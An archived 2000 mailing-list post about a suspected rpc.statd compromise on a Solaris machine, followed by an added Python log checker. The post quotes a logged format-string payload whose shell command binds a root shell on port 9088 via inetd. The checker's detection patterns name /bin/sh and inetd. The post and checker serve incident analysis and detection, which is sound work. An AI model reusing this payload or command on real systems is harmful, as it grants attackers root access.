Security Incidents mailing list archives

A statd exploit?


From: Randy Nethers <rnethers () MAIL GEOTOUCH COM>
Date: Tue, 15 Aug 2000 12:35:00 -0700

Yesterday, a friend of mine from a local university asked me to take a look at
a machine (an Ultra 2 w/Solaris 2.6) which had rebooted itself yesterday morning
(Aug 14th) for no apparent reason.

After poking around, I could find nothing of interest, except two things.
First I found in /var/adm/messages.0 the following line:

Aug 12 00:58:07 ultra2 statd[178]: statd: attempt to create "/var/statmon/sm/%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%nK^v ^( ^ ^.  #^1 F'F* FF+, NV1@/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m;"

Also, this single entry in the messages file is the only message in any of the
log files from Aug 12, which I find strange.  (There are lots of messages in
/var/log/syslog from the Saturday before, but none for Aug 12, for instance
regarding emails going to and from the machine.)

The reboot occurred at about 9:30 am, just before people at the office where the
machine is located started using it.  The machine has Oracle on it.  I was
wondering if this might have anything to do with the rpc.statd exploit discussed
earlier on this list where a user found a file called /tmp/bob.  I looked, but
obviously, with the machine having been rebooted, there would be nothing in
/tmp.

Anybody have any ideas?

Thanks,

Randy Nethers
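As an added example that is not part of the original post: a small Python checker for the two things the post finds strange, statd messages whose statmon file name carries printf conversions (%n, zero-padded %0Nx) or shell/inetd fragments, and calendar days with a lone log entry. The sample lines are constructed except for the statd entry quoted above, which is joined back onto one line.

```python
import re
from collections import Counter

# Solaris-style syslog line: "Mon DD HH:MM:SS host prog[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>(?P<day>[A-Z][a-z]{2} [ \d]\d) \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
# printf conversions have no business in a client-supplied statmon file name:
# %n writes to memory, and zero-padded %0NNNx adjusts the byte count before it.
FORMAT_SPEC_RE = re.compile(r"%0?\d*[xn]")
SHELL_RE = re.compile(r"/bin/sh|/usr/sbin/inetd|\bnowait\b")

# Constructed sample log; only the Aug 12 statd entry is taken from the post.
SAMPLE_LINES = [
    "Aug 11 23:10:12 ultra2 statd[178]: statd: server ultra2 restarted",  # constructed
    "Aug 11 23:10:15 ultra2 sendmail[201]: daemon started",                # constructed
    "Aug 12 00:58:07 ultra2 statd[178]: statd: attempt to create \"/var/statmon/sm/%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%nK^v ^( ^ ^.  #^1 F'F* FF+, NV1@/bin/sh -c echo \"9088 stream tcp nowait root /bin/sh -i\" >> /tmp/m; /usr/sbin/inetd /tmp/m;\"",
    "Aug 13 08:00:02 ultra2 sendmail[201]: alias database rebuilt",        # constructed
]

def classify_statd_line(line):
    """Return None for non-statd lines, else a dict listing the indicators found."""
    m = SYSLOG_RE.match(line)
    if not m or not m.group("prog").startswith("statd"):
        return None
    msg = m.group("msg")
    indicators = []
    writes = msg.count("%n")
    if writes:
        indicators.append(f"{writes} x %n")
    if len(FORMAT_SPEC_RE.findall(msg)) >= 4:
        indicators.append("repeated %x/%0Nx conversions")
    if SHELL_RE.search(msg):
        indicators.append("shell/inetd fragment")
    return {"ts": m.group("ts"), "host": m.group("host"),
            "pid": m.group("pid"), "indicators": indicators}

def suspicious_statd_entries(lines):
    return [c for c in map(classify_statd_line, lines) if c and c["indicators"]]

def messages_per_day(lines):
    """Entries per day; a day with a single entry warrants asking whether
    syslogd was stopped or the file was edited, not just what that entry says."""
    return Counter(m.group("day") for m in map(SYSLOG_RE.match, lines) if m)

if __name__ == "__main__":
    for hit in suspicious_statd_entries(SAMPLE_LINES):
        print(hit["ts"], hit["host"], "statd pid", hit["pid"], "->", ", ".join(hit["indicators"]))
    print(dict(messages_per_day(SAMPLE_LINES)))
```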

